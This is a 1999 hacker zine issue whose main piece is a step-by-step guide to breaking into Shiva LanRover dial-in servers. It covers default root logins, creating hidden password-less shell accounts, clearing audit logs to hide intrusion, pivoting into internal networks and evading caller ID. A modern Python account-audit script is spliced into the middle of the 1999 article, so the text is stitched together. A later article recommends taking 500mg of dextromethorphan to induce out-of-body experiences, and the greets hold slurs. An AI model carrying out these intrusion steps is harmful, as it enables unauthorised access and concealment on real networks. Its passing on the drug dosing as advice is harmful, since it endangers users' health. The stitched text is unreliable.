[ from the unexplored areas of the human brain comes.. ]

s e v e n

the experience of new ideas and obtuse perspective

[b4b0 inc. (c) 1999 all rights reserved]
[ disrupting the classes of school teachers ]
[ around the world. ]
[ this zine is best viewed in vi ]

[TABLE OF CONTENTS]

(00). Greets, Hellos, Staff, What not.
(01). Introduction - by ph1x *y0r elite edit0r* (heed my advice)
(02). Hacking Shiva-Lan-Rover-Servers - [Hybrid]
(03). How to have an out of body experience - [ph1x]
(04). Womper language interpreter - [chrak]
(06). Buffer overflow exploitation - [ph1x]
(07). The stupidity that lies in credit fraud - [KKR]
(08). Screwing around with /dev/audio - [ph1x]
(09). My day in age(Firewall, a magic bullet?) - [rhinestone]
(10). d0x (For your harassing enjoyment) - [pG]
(11). Coding a shell from the ground up - [ph1x]
(12). The art of writing shell code - [smiler]
(13). The telephone system/network part 1 - [pabell]
(14). Wu-ftpd remote/local exploit for [12]-[18] - [cossack/smiler]
(15). Wu-ftpd buffer overflow scanner for 12-18 - [ph1x]
(16). IRC lawgz, cybersex erotica - [b4b0]
(17). Revolution against the catholic church - [schemerz]
(18). bsaver.c overview - [cp4kt]
(19). Conclusion - [ph1x]

Additional pieces included in this issue of b4b0 are...
[ bouncer.c ] ----------> /juarez/bouncer.c | intruderx [ Encrypt.c ] ----------> /juarez/encrypt.c | tragen [ GHCgi.c ] ------------> /juarez/Cgi.c | FreD [ Carp.c ] ----------> /juarez/carp.c | comp4ct [ Scanned dialups ] ----> /juarez/carriers | comp4ct [ FreeBSD rootkit ] ----> /juarez/fsd.gz | icesk [ b4b0 screensaver ] ---> /juarez/bsaver.c | cp4kt/qytpo [ el8 .zip of misc ] ---> /juarez/misc.zip | milcrat . -- ---b-4-b-0--r-e-v-o-l-u-t-i-o-n-a-r-i-e-z--- -- - | | ph1x ----------- -----> the chosen one : jsb4ch ---- --- -------> the undecided one . t1p ------- --------> acclaimed b4b0 adm1n gr1p ----- -- - -------> he whos accent slays . j\ ------ -- ---- -----> the freezing wonder chr4k ----- ------ ----> the one who operates with a blown mind comp4ct --- ------ ----> he whom claims to be a b4b0 saint . p4bell ---- ------ ----> the one called the golden child coss4ck ---------------> the one of proclamation sm1ler ----------------> he who is emotionally content . -- ---b-4-b-0--w-r-i-t-e-r-s--a-n-d--o-t-h-e-r--p-e-r-v-e-r-t-s--- -- - | | icesk emf zayten : pG schemerz Hybrid assem . Qytpo e- rhinestone samj jnz polder . --- Official IRC channel -> efnet / #b4b0 --- most idiotic site ever -> www.anticode.com --- irc chick of the month -> MostHated --- greets to -> #!animalcrackers, rhino9, samjs mom, duke, horizon, LJ & Falon, HNN, those who know who they are that have helped us and that we forgot about *sorry*, chixy + miah of the netcis crew (some of us started there!), the trench coat mafia, the NRA --- homosexual -> so1o (its good you came out of the closet) --- fuck yous -> DigiEbola, silitek (as always), those who live their lives around 'taking irc channels', and people who molest their children (u siq fuqz) --- note -> just because you have a southern accent and hate jews doesn't mean you don't have to pay your taxes. --- interesting fact -> the now irc fad of saying "HEH" was invented in #b4b0. 
so we must require you to say the following when using HEH : HEH (c) b4b0 1999 --- P.S. -> we need more supporters who will write things for us other than inetd backdoors. submit your article/code/remarks submissions@b4b0.org - -- ---> the bandz <--- -- - lo fidelity all stars, rage against the machine, the chemical brothers, the crystal method, misfits, minor threat, the decepticonz, danzig, and much, much much more! - -- ---> interesting <--- -- - -- -- > www.babo.com - best gossip in korea! -- -- > www.babo.net - aleman? -- -- > trench coat mafia - bang. -- -- > vandalisation of body - s4d1zm -- -- > british association of balloon operators (babo) - fear that. ------------------------------------------------------------------------------- !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! ------------------------------------------------------------------------------- Greatest movie of all time, "Gummo". ----> I walked into the fruit market today, the clerk thought I was some out of town hick. "Those apples will be 2 dollars a piece." He tells me. This is where I outsmarted him. I hand him a 5 dollar bill, and just as he's handing me a dollar change, I say.. "keep it, were even." On the way out, I stepped on a grape. ****************************************************************************** [INTRODUCTION] ****************************************************************************** y0y0y0 We have had several people who have taken charge as editor for this issue, but have not followed through with there responsibilities. Therefore, me(ph1x) the unreliable drug addict has been chosen to get all of the submissions together and put together a nice issue with good quality reading material. I have miraculously managed to do so, so read to your hearts desire, and enjoy this issue. HEH!. PS. I apologize for the extreme lateness of this issue, its just that jsbach *cough* I mean.. 
various people said they were going to write articles, and never did. =)

MISC:

QUOTE: you are the maker of your own destiny (Kwan = Gemmi) <-- These words inspired me.

Real hackers drink chocolate milk!

b4b0 site of the month: http://www.frognet.net/dxm <- CHECK IT OUT!

L3tz giaT diZ sm4ck g01nG!@#$

-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
Hacking the Shiva-LAN-Rover System
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-

By Hybrid (th0rn@coldmail.com)
April 1999

Contents:

1. Introduction
2. What can Shiva lan rovers do?
3. The command line
4. System security
5. PPP

1. Introduction

Shiva systems are becoming increasingly popular in the LAN networking world. If, like me, you have done quite a lot of scanning, you will have come across a login prompt similar to this:

  [@ Userid:]

If you have never seen this before, take a look at some of the 9x scans at www2.dope.org/9x. In this file I am going to focus on the security strengths and weaknesses of the ShivaLanRover networking system, and give a general overview of what can be done with such systems. The Shiva system is a network security problem in its own right, in the sense that once you have gained access to one of these platforms, you have the opportunity to explore the entire network on which the system is based. In essence, you are on the trusted side of the firewall. If you would like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it via the WWW.

To find a Shiva, the first thing you should do is dust off that old wardialer program, and start scanning local or toll-free prefix assignments, if you can't do this, you suck, go away. You will know when you have found a Shiva when you are confronted with the following prompt:

  @ Userid:

or if Radius authentication is enabled:

  Starting Radius Authentification....
  @ Userid:

Blah, ignore the Radius authentication thing for now, it's just a lame attempt to make the system look as if it has been secured. In most cases the sysadmin will have misconfigured the authentication, and you will be surprised how easy it is to get in.

So you are at the login prompt, what next? As in most OS's, Shivas have a nice set of default logins, so the sysadmin's poor setup is your gain. Try this: login: pass: . The root login will work 9 times out of 10. The reason that the root account works a lot is because in some cases the admin is not even aware the account exists! Most of the system setup is done via the main terminal, so the admin doesn't have to log in. The root account is not listed in the userfile database, so most admins overlook it. In some cases the admin would have set up their own account with something like but if the admin has any common sense you will not get in with that. Like most OS's, Shiva systems have an audit log, so don't sit there trying to brute force anything. Once you are in, you can clear the system log, but more on that later.

OK, you've found a Shiva, you've logged on as , now what? Read on.

Once logged in, you will be dropped into the Shiva command line prompt, which should look something like this:

  Shiva LanRover/8E, Patch 4.5.4p6 98/06/09    (Version and type of Shiva)
  ShivaLanRover/8E#                            (The command prompt. Can be configured to say anything)

To get a list of the available commands type or this will reveal a menu similar to this:

  ShivaLanRover/8E# ?
  alert          Send text alert to all dial-in users
  busy-out line  Busy-out serial line modem
  clear          Reset part of the system
  comment        Enter a comment into the log
  configure      Enter a configuration session
  connect        Connect to a shared serial port
  crashdump      Write crashblock to log
  disable        Disable privileges
  help           List of available commands
  initialize     Reinitialize part of the system
  lan-to-lan     Manage LAN-to-LAN connections
  passwd         Change password
  ping           Send ICMP echo to IP host
  ppp            Start a PPP session
  quit           Quit from shell
  reboot         Schedule reboot
  show           Information commands, type "show ?" for list
  slip           Start a SLIP session
  telnet         Start a Telnet session
  testline       Test a line

The first thing you should do is check to see who is online. At the # prompt use the show command to reveal the list of current online users:

  ShivaLanRover/8E# show users
  Line  User     Activity  Idle/Limit  Up/Limit
     1  jsmith   PPP         0/ 10     0/ None
     2  root     shell       0/ 10     0/ None
  Total users: 2

So here we see ourselves logged in on line 2, and a PPP user on line 1. Note that most of the time users are not configured to be allowed remote dialin PPP access, so the user jsmith is probably at a terminal on the LAN. Now you can see who is online, ie- check the admin is not logged in. Now you need to get a rough idea of the size of the system and its network. At the # prompt type:

  ShivaLanRover/8E# show lines
  Async Lines:
  Line State  Rate/P/Stop/  RA|DCD|DSR|DTR|RTS|CTS|Fr errs| Overruns|PErrs
     1 IDLE    57600/N/ 1/    |OFF|ON |on |on |ON |      0|        0|    0
     2 CHAR    57600/N/ 1/    |ON |ON |on |on |ON |      2|        0|    0
     3 IDLE    57600/N/ 1/    |OFF|ON |on |on |ON |      0|        0|    0
     4 IDLE    57600/N/ 1/    |OFF|ON |on |on |ON |      0|        0|    0
     5 IDLE    57600/N/ 1/    |OFF|OFF|on |on |OFF|      0|        0|    0
     6 IDLE   115200/N/ 1/    |OFF|ON |on |on |ON |      0|        0|    0
     7 IDLE    57600/N/ 1/    |OFF|ON |on |on |ON |      0|        0|    0
     8 IDLE   115200/N/ 1/    |OFF|ON |on |on |ON |      0|        0|    0

Here we see a list of the modem ports. As you can see it has 8, which is about average for most Shiva systems.
So now we know how many serial lines there are, we need to get a rough idea as to how big the network itself is. To do this type:

  ShivaLanRover/8E# show arp
  Protocol  Address          Age  Hardware Addr      Type  Interface
  Internet  208.122.87.6      4m  x0-x0-B0-2x-Dx-78  ARPA  Ethernet:IP
  Internet  208.122.87.4      4m  AA-0x-x4-00-0C-04  ARPA  Ethernet:IP
  Internet  208.122.87.5      4m  Ax-00-04-0x-xD-x4  ARPA  Ethernet:IP
  Internet  208.122.86.4     10m  AA-x0-04-00-0C-04  ARPA  Ethernet:IP
  Internet  208.122.86.40     0m  AA-00-04-00-x1-04  ARPA  Ethernet:IP
  Internet  208.122.86.147    4m  00-80-5x-31-F8-Ax  ARPA  Ethernet:IP
  Internet  208.122.86.145    4m  00-80-5x-FE-C9-x8  ARPA  Ethernet:IP
  Internet  208.122.86.200    0m  00-x0-A3-xF-21-C8  ARPA  Ethernet:IP
  Internet  208.122.86.51     4m  00-x0-B0-01-36-3x  ARPA  Ethernet:IP

Showing the arp cache reveals some of the boxes connected to the LAN, as well as their ethernet addresses and the type of protocol. Now we have established the kind of system we are on, it's time to do some exploring, which is where I shall begin this text file.

2. What can Shiva lan rovers do?

Shiva LanRover systems are very big security weaknesses if installed on any network. The reason for this is that some of the default settings can be easily overlooked by the admin. A Shiva system can be configured to provide a wide variety of network services, some of which are listed here:

PPP (point-to-point protocol)

This is the key to gaining access to the network on which the Shiva is based. In most cases the network will have an internal DNS server, and if you are lucky, the network on which the system is based will be connected to the internet. Hint hint, PPP, toll-free. But just using a Shiva for free net access would be boring, which is why I am going to discuss the other features of Shivas.

Modem Outdial.
In a lot of cases the system would have been configured to allow modem outdialing which can be good for calling BBS's, diverting to other dialups, scanning, but again, this is lame, just using a Shiva for modem outdialing is boring, use your imagination. If you manage to get a PPP connection, and the system is net connected, you could get online, and at the same time call your favourite BBS. I'll explain how to do all of this later.

Telnet, ping, traceroute etc.

These are the command line tools which will enable you to determine whether the system is connected to the internet or not. More on this later.

It's time to go into detail about all of the Shiva's functions and commands. I will concentrate on what you can do with root access, because that is the only account you are likely to gain access to.

3. The command line

When logged into the Shiva shell, you have the following commands at your disposal:

alert (Send text alert to all dial-in users) - Self explanatory.
busy-out uart (Busy-out UART port)
clear (Reset part of the system)

The clear command is a nice feature of the Shiva system. The first thing you should do when on a Shiva is make sure you erase all logs of your commands and login times etc.. to do this all you need to do is type This will erase and reset the audit log, and also any invalid logins to the Shiva. There are also other clear commands such as etc, but these will all cause system problems and get you noticed, best leave this alone for the time being.

comment (Enter a comment into the log)
configure (Enter a configuration session)

Here's the part where you can get the system to do what you want it to do, ie- to get a PPP connection you will need to set up another account with shell and PPP privileges. The root account does not allow PPP connections, so here is where you will need to do your stuff.
To get anywhere with a Shiva you need to create a new account. Using the config command you can create a new user account with greater privileges than root. Before you make a new account it is a good idea to see what kind of setup the other accounts have on the system, you don't want to make an account that will stick out from the other accounts, so type:

  show security

(this gives a list of the security configuration and the user list.) You should see something like this:

  [UserOptions]
  PWAttempts=0
  ARARoamingDelimiter=@
  ExpireDays=30
  GraceLogins=6
  [Users]
  admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425
  jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052
  mjones=/di/pw/pwd=kRaOhlyT7CKMBldLVBVbektbCE/ml=2/fail=5/time=897646052
  user911=/di/pw/pwd=7Xkq8TOwB4juRI51OHkDVVos8S/ml=2/time=910919159
  another=/di/pw/pwd=YhzD6KBUB7Lh2iKKKSWxuR0gx7S/ml=2/fail=7/time=90767094|9
  jadmams=/di/pw/pwd=ET0OhPyT7CyMBldLLKVbektbCE/ml=2/time=902262821
  msmith=/di/pw/pwd=sDV1Jxo8QJncIRcl9eoVO6SKBE/ml=2/time=897646052
  dsmith=/di/pw/pwd=pv8OhPyT45CyMBldLSKVbektbCE/ml=2/time=897646052
  padacks=/di/pw/pwd=HoDVw5MqTM*oTL69tBehqt7tiS/ml=2/time=897646052/grace=1
  ljohnson=/di/pw/pwd=r.y9NJbrCWKfsSeu9FbfJpAIzZ/ml=2/time=897646052

Here we get a list of the configured users on the system. As you can see the admin has made him/herself their own account, while other users have accounts that allow logins via their terminals, but not remotely. In the above example all the users have been assigned passwords, so it would be a good idea when you make your own account to have one as well. The idea is to make an account that will blend in with the others and not look too obvious. The passwords in the external user list are all 3DES (triple DES) encrypted. The type of user account set up is determined by the options, such as jsmith=/di/do etc, more on these functions in a bit.
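An account added to blend in with this list still differs from a saved copy of it. The following is an added example, not part of the original article or any Shiva tooling: it diffs a saved [Users] section against a known-good baseline and flags new accounts, newly granted /sh or /rt switches, and entries with no pwd= value. The sample data and placeholder hashes are constructed; the switch meanings are the ones the article gives, and reading a missing pwd= as "no password set" is an assumption drawn from the article's description of a freshly created account.

```python
"""Diff a saved LanRover [Users] section against a known-good baseline."""
from dataclasses import dataclass, field

# Switch meanings as the article gives them: /sh = remote command shell login,
# /rt = root privileges. Every other switch is treated as an opaque token.
PRIVILEGED = {"sh", "rt"}

# Constructed sample data in the layout of the article's "show security" listing.
# The pwd= values are placeholders, not real hashes.
BASELINE = """\
[UserOptions]
PWAttempts=0
ExpireDays=30
[Users]
admin=/di/do/rt/pw/sh/pwd=PLACEHOLDERHASH1/ml=3/fail=1/time=425
jsmith=/di/pw/pwd=PLACEHOLDERHASH2/ml=2/time=897646052
mjones=/di/pw/pwd=PLACEHOLDERHASH3/ml=2/fail=5/time=897646052
"""

# Same device later (constructed): jsmith gained /sh, and an account with no
# pwd= value appeared.
CURRENT = """\
[UserOptions]
PWAttempts=0
ExpireDays=30
[Users]
admin=/di/do/rt/pw/sh/pwd=PLACEHOLDERHASH1/ml=3/fail=1/time=425
jsmith=/di/pw/sh/pwd=PLACEHOLDERHASH2/ml=2/time=897646052
mjones=/di/pw/pwd=PLACEHOLDERHASH3/ml=2/fail=5/time=897646052
username=/di/do/sh/tp/pw
"""


@dataclass
class Account:
    name: str
    switches: set = field(default_factory=set)   # bare switches, e.g. "sh"
    fields: dict = field(default_factory=dict)   # key=value parts, e.g. pwd=


def parse_users(config_text):
    """Return {name: Account} for every entry in the [Users] section."""
    accounts, in_users = {}, False
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            # Section names are matched case-insensitively ([Users] / [users]).
            in_users = line[1:-1].lower() == "users"
            continue
        if not in_users or "=" not in line:
            continue
        name, _, spec = line.partition("=")
        acct = Account(name.strip())
        # Assumes "/" never occurs inside a value, as in the article's listing.
        for part in spec.split("/"):
            if not part:
                continue
            key, sep, value = part.partition("=")
            if sep:
                acct.fields[key] = value
            else:
                acct.switches.add(key)
        accounts[acct.name] = acct
    return accounts


def audit(current_text, baseline_text):
    """Return a list of (severity, account, message) findings."""
    current, baseline = parse_users(current_text), parse_users(baseline_text)
    findings = []
    for name, acct in sorted(current.items()):
        known = baseline.get(name)
        if known is None:
            sev = "high" if acct.switches & PRIVILEGED else "medium"
            findings.append((sev, name, "account not in baseline, switches: "
                             + ",".join(sorted(acct.switches))))
        else:
            gained = acct.switches - known.switches
            if gained:
                sev = "high" if gained & PRIVILEGED else "medium"
                findings.append((sev, name, "switches added since baseline: "
                                 + ",".join(sorted(gained))))
            if acct.fields.get("pwd") != known.fields.get("pwd"):
                findings.append(("info", name, "pwd= value changed since baseline"))
        if not acct.fields.get("pwd"):
            findings.append(("high", name,
                             "no pwd= value, account has no password set"))
    for name in sorted(set(baseline) - set(current)):
        findings.append(("info", name, "account removed since baseline"))
    return findings


if __name__ == "__main__":
    for severity, name, message in audit(CURRENT, BASELINE):
        print(f"{severity:6} {name:10} {message}")
```

Because the article notes that the root account does not appear in this user list, a check like this covers only listed accounts; root logins have to be watched in the audit log instead.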
OK, now we need to set up our own account. To do this we need to enter a configuration session. At the command line prompt type:

  ShivaLanRover/8E# config

You will then drop into the configuration session.

  Enter configuration file lines. Edit using:
    ^X, ^U     clear line
    ^H, DEL    delete one character
    ^W         delete one word
    ^R         retype line
  Start by entering section header in square brackets []
  Finish by entering ^D or ^Z on a new line.
  config>      (here is where you enter the config commands, to make your own account do the following)
  config> [users]
  config> username=/di/do/sh/tp/pw
  config> ^D   <------ (type control D to finish)

  Review configuration changes [y/n]? y
  New configuration parameters:
  [users]
  username=/di/do/sh/tp/pw
  Modify the existing configuration [y/n]? y
  You may need to reboot for all changed parameters to take effect.

You've just created your own user account which you can use for PPP connections etc. To begin with your account is un-passworded, so when you log back in just hit enter for your password, you can later change this. The /sh part of the user configuration means you can remotely log into the command shell, /pw means you have the ability to define your own password. If you wanted to give yourself another root account, you would use the switch /rt. In combination with the show config command you can also alter other system configurations via this method, although it is a very good idea not to alter anything. Now your account has been set up, all you do is re-connect to the system and login as your username, more on this later.

connect (Connect to a serial port or modem)

This is another one of the good features of Shivas, you can remotely control a series of modems on the system, and in a lot of cases dialout. If you want to call a BBS, note you cannot upload using Zmodem or similar protocols, although you would be able to download, but expect a few CRC checksum errors.
To connect to a modem type:

  connect all_ports

You will then drop into one of the modem pools, as follows:

  Connecting to Serial2 at 115200 BPS.
  Escape character is CTRL-^ (30).
  Type the escape character followed by C to get back,
  or followed by ? to see other options.

(here basic modem commands are necessary, use the following to dialout)

  ATZ              (initialise modem)
  ATDTxxxxxxxxx    (atdt then phone number)

Note in some cases the modem outdial will be based upon the system PBX, so sometimes you will have to figure out the outdialing code, which should be something simple like dialing a 9 before the number you want to connect to. To disconnect from the outdialing session type control C, or ^C. This will take you back to the command line. As with the other system events, outdialing is logged into the audit file, along with the number you called. It is generally a good idea to clear the audit log after things like PPP or dialout, again just type clear log .

cping (Send continuous ICMP echoes to IP host)
crashdump (Write crashblock to log)
detect (Detect the configuration of an interface)
disable (Disable your root privileges)
dmc (Information commands, type "dmc ?" for list)
  down (last Remove modems from CCB pool)
  info (Print info for specified modem)
  mupdate (l Update Rockwell modem FW)
  state (Print state of a modem)
  status (Print status of all modems)
  trace (Trace message passing)
  up (lastmo Add modems to CCB pool)
  test_1slot (Tests DMC card in slot specified)
  test_allcards (Tests all DMC cards found in system)
  test_golden (Tests all DMC cards against a Golden DMC)
  test_loopall (Tests All DMC's for count)
  test_modempair (modem1 Tests modems against each other)
  test_slotpair (Tests a DMC card against another)
  test_xmitloop (Tests modem pair for count)
help (List of available commands)
history (List of previous commands)
initialize (Reinitialize part of the system)
l2f (L2F commands)
  close (Close tunnel to L2F HG)
  login (Start L2F session)
  tunnels (Show open tunnels)
lan-to-lan (Manage LAN-to-LAN connections)
passwd (Change password)
ping (Send ICMP echo to IP host)
ppp (Start a PPP session)
quit (Quit from shell)
reboot (Schedule reboot)
route (Modify a protocol routing table)
rlogin (Start an rlogin session)
show (Information commands, type "show ?" for list)

show+
  account (Accounting information)
  arp (ARP cache)
  bridge (Bridging information)
  buffers (Buffer usage)
  configuration (Stored configuration, may specify sections)

The show config command will reveal all the system configuration setups, including DNS server information, security configurations, IP routing etc. It will also show the internal IPs of Radius authentication and TACACS servers.

show+
  finger (Current user status)
  interfaces [name1 [name2 ... ] (Interface information)
  ip (Internet Protocol information, type "show ip ?" for list)

To get an idea of the routing information, and again how big the network is, type show ip route. This will bring up a routing table, and again give you an idea as to where the connected boxes are. It is a good idea to note the IP prefixes.
show+
  lan-to-lan (LAN-to-LAN connections)
  license (Licensing information)
  lines (Serial line information)
  log (Log buffer)

The show log command will display the system audit log in more format. Here you will be able to see what is going on on the system, ie- is it primarily used for PPP, dialout etc. If users use the system for outdialing, you can even see the numbers that they dial. Here is a cut down example of what you would see in a system log file:

  Mon 15 16:24:29 GMT 1998 4530 Serial4: "krad" logged in
  00:01 4531 Serial4:PPP: Received LCP Code Reject for code 0D
  00:01 4532 Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B)
  00:00 4533 Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast
  00:00 4534 Serial4:PPP: IPCP layer up
  00:04 4535 Serial4:PPP: CCP layer up
  14:09 4536 Serial4:PPP: IPCP layer down
  00:00 4537 Serial4:PPP: CCP layer down
  00:00 4538 Serial4:PPP: LCP layer down
  00:01 4539 Serial4:PPP: CD dropped on connection
  00:00 4540 Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,)
  00:06 4541 Serial4: Rate 115200bps
  00:00 4542 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
  00:01 4543 Serial4: Initialized modem
  04:56 4544 setting time of day from real-time clock to Wed Nov 25 16:43:44
  18:27 4545 Serial4: New Dial-In session
  00:00 4546 Serial4:PPP: LCP layer up
  00:00 4547 Serial4: "krad" logged in
  00:01 4548 Serial4:PPP: Received LCP Code Reject for code 0C
  00:00 4549 Dialin:IPX configured net 9823O049
  00:00 4550 Serial4:PPP: IPXCP layer up
  00:00 4670 Serial4: New Command Shell session
  00:03 4671 Serial4: "root" logged in
  01:38 4672 Serial4: "root" logged out: user exit after 01:42 (Command Shell)
  00:06 4673 Serial4: Rate 115200bps
  00:01 4674 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
  00:00 4675 Serial4: Initialized modem
  55:11 4676 Could not parse IP SNMP request.

In the system log, you will also see invalid login attempts, error messages, and general system events.
Because the log file logs everything, it is a good idea to erase your own presence in it.

show+
  modem (Internal modem information, type "show modem ?" for list)
  netbeui (NetBeui information, type "show netbeui ?" for list)
  novell (NetWare information, type "show novell ?" for list)
  ppp (PPP multilink bundles and links)
  processes (Active system processes)
  security (Internal userlist)
  semaphores (Active system semaphores)
  slot (Internal serial slot information, type "show slot ?" for list)
  upload (Upload information)
  users (Current users of system)
  version (General system information, also shows DNS info)
  virtual-connections (Virtual Connection information)
slip (Start a SLIP session)
telnet (Start a Telnet session)
tftp (Download new image, ie- system config files)
tunnel (Start a Tunnel session)
wan [action] (Perform actions on WAN Interface)

4. System security

Shivas can be very weak on security, due to the exposed root account. If the system is configured properly they can be very secure systems, although this is usually not the case. There are many security options for the Shiva system including Radius authentication, SecurID, TACACS, and just the standard secured login. In some cases an admin will use a secondary server to act as the Radius authentication server. In this case, the setup would look something like this.

  [RADIUS Authentication Server]   } The server contains a secured user
               |                     list, which will be used to verify
               |                     login requests. The login is
           [Router]                  determined if the user can be
             |  |                    verified by the server.
             |  |                  } The Shiva sends the login request to RADIUS.
        [Shiva System]             } Starting Radius Authentification...
                                     @ Userid:

Sometimes a system will be configured to work with a number of different Shivas on a network. For example, using the same idea as above, but without the Radius server, a secondary Shiva may be installed to act as the security server, with all the other Shiva systems referring to it for user login verification.
This can be a real bitch if you have logged into a system, but the above setup has been implemented. For example, say you logged in as root, and you want to set up a PPP account. The first thing you would do is check to see what kind of setup existing users have by typing If the verification server has been set up, there will be no users in the user list, instead you have to find the network location of the verification server, and hope it has an un-passworded root account on it. To find the verification server, or primary Shiva, just use the show config command. You can then telnet from the Shiva you are on to the Shiva displayed in the config file. You should then get the @ Userid: login screen again, try root no pass. If this does not work, it is possible to temporarily configure your own server on the network, but this would mean other users will not be able to login, so leave this alone. If you do manage to login to the server as root, you have to set up your user account there, because that is where all the Shivas on the network refer to in order to verify users. This way the admin only has to maintain one user configuration file.

5. PPP

Once you have set up a user account with shell and PPP privileges, you can begin exploring the network on which the Shiva is based. If the network is net connected you can get free net access as well, but this is quite risky, especially if the admin notices PPP sessions active at 4am, with destinations such as irc.ais.net:6667. When you first establish a PPP connection to a Shiva server, the first thing you should do is map out the network. To do this just run a network or port scanner across the domain which the Shiva is on. As on most networks, you are likely to come across a variety of different boxes, such as UNIX boxes, SunOS, shared printers, mail servers, cisco routers, in one case someone I know found an Amiga box@$!.
If the network is net connected, it is a good idea to use your shell for any net connections, such as IRC. Once you have an external net connection from a Shiva it is also possible to simultaneously dialout across the PSTN to a BBS or any other system. To do this, you would have to find the network address of the Shiva server you are on, then telnet back to it and re-login. Using the command will give you control over the system modems, then you can dialout as if you were in terminal mode.

If the Shiva you are on is located on a toll-free number, or even local, it is not a good idea to use it for net access, or stay on it for a long time. If you must use a Shiva for net access, it is a good idea to use your PSTN routing skills, and not dialup to the system directly. The mistake people make when it comes to ANI, or CLID, is that they think only 800 numbers have ANI, and residential numbers have CLID. This is *wrong*, the ANI service can be set up by anyone, it's a choice, not a standard. If you want to route your call, the best thing to do is route internationally, so your originating CLID gets stripped at intraLATA boundaries on the PSTN. A technique, which I don't wanna give out, involves trunk and carrier hopping.

Well, that's about it for this file, hope you enjoyed it. If you want more information on the Shiva Lan Rover system, just check out shiva.com, they will have technical guides in pdf format, you can also download the Shiva software from their ftp site.

Shouts to the following:

[9x] substance phriend siezer vectorx statd blotter knight network specialK microdot katkiller xramlrak bosplaya deadsoul and nino the 9x g1mp.
[b4b0] gr1p t1p. #9x #darkcyde Efnet. backa xio.
[D4RKCYDE] downtime elf zomba force mortis angel dohboy brakis alphavax tonekilla bishopofhell sintax digitalfokus mistress.
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
[Astral Projection]
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-

How to have an out of body experience. ph1x.

In this article I am going to explain what astral projection is, and my personal method of accomplishing it.

NOTE: This method works for me while sober, and on dxm. This method may not work for everyone, and is just my personal way of inducing OOBE.

You may or may not have heard about people leaving their physical bodies and projecting themselves into a higher dimension, known as the astral plane. Believe it or not, this strange act of phenomena is totally real, and many people today practice methods that will eventually lead them to dissociating themselves from their physical bodies. It is said by some that the whole sensation of leaving your body and exploring the astral plane is a state of mind. That is definitely not true. I myself, and many others, have done experimentation. When you get up and step out of your body you are seeing what is going on in the world just as you would see it if you were in your physical body. You are just seeing it from the perspective of a different dimension. The 4th dimension.

3/12/99 - I ingested 500mg of dxm (Dextromethorphan helps induce OOBE). After the effects started coming on, I lay down in my bed. After about 15 minutes of rhythmic breathing, my body was totally relaxed. I lay there with a clear mind. My body starts vibrating after about another 5 minutes. After feeling like my chest was being crushed by some massive force I got a tingling sensation and I could see through my eyelids. From there, I laid a moment then lifted my arms slowly until I felt them slide out of my physical body. I sat up and stared at my lifeless looking body. And I realized, my body is not me, it is just a shell for my soul. With that in mind I decided that I wanted to fly to seattle for no particular reason.
After patrolling the streets of seattle where I once lived, I felt an urge to get back to my body but wanted to stop at my ex girlfriend's house first. I sort of bounced my way up to her house by gliding through the air. I went into her room, where we previously used to sit and smoke pot. I saw a figure sitting in the desk chair with its back towards me. It slowly turned around, and it was rather a grotesque looking boy with a sort of transparent image. When he smiled, I realized that I had seen him before at my house in seattle when I woke up one night after a horrifying dream. I quickly flew back to my body, through blurs of colors and over trees and buildings. As I laid in my body, I felt like I couldn't get back in alignment. I started to get sorta freaked out but after a few minutes of struggling I managed to regain contact with my physical parts.

True story? Of course. If you would like to try something like this, I am giving you my personal method in having out of body experiences. Expect this to take some practice and time. If you are willing to take dxm to help induce an OOBE, then great. It makes it 10 times easier.

First lay down, on the floor or on your bed. Your head and feet should be even. Meaning you shouldn't be laying on a pillow or anything. Next with your hands at your sides, start out with rhythmic breathing. Like so:

  Breathe in for 2 seconds
  Breathe out for 4 seconds
  Breathe in for 2 seconds
  Breathe out for 4 seconds
  Breathe in for 2 seconds
  Breathe out for 4 seconds
  Breathe in for 3 seconds
  Breathe out for 6 seconds
  Breathe in for 3 seconds
  Breathe out for 6 seconds
  Breathe in for 3 seconds
  Breathe out for 6 seconds
  Breathe in for 4 seconds
  Breathe out for 8 seconds
  Breathe in for 4 seconds
  Breathe out for 8 seconds
  Breathe in for 4 seconds
  Breathe out for 8 seconds

The whole time you are doing this rhythmic breathing, you should be letting yourself get totally relaxed. Don't worry about dozing off or entering a sleep state, because that in itself could help you leave your body. One of the main theories behind astral projection is that you are in a sleeping state while still being in a conscious type state of mind. On one occasion, I felt that I had fallen asleep. Then I woke up, and stood up out of bed. A second later I realized it was a totally false awakening because I saw my physical body laying there on my bed limp and breathing. Another thing, as you are doing this try to maybe breathe in a way that you are breathing in correspondence to your heart's rhythm. For example, you feel your heart beat, then you breathe in for two seconds, you hear it beat again, then you breathe out for four seconds. Just experiment with it, and find your own technique in getting really relaxed.

Repeat this method until every muscle in your body is relaxed to its fullest. After this, try to have a totally clear mind. Think about absolutely nothing. Concentrate only on your feet until they start to feel like they are floating. Move up to your hips and concentrate in the same manner. By now, you should start feeling powerful vibrations throughout your body, like you're being electrocuted. You may even feel pain. But that is one of the things you will have to learn, trust that you will be ok. Don't back down, it is all a state of mind. After much vibration you may be able to see through your eyelids. This means you have succeeded. From here, picture yourself rising out of your body. And you may just find yourself sitting up and exiting your physical shell.

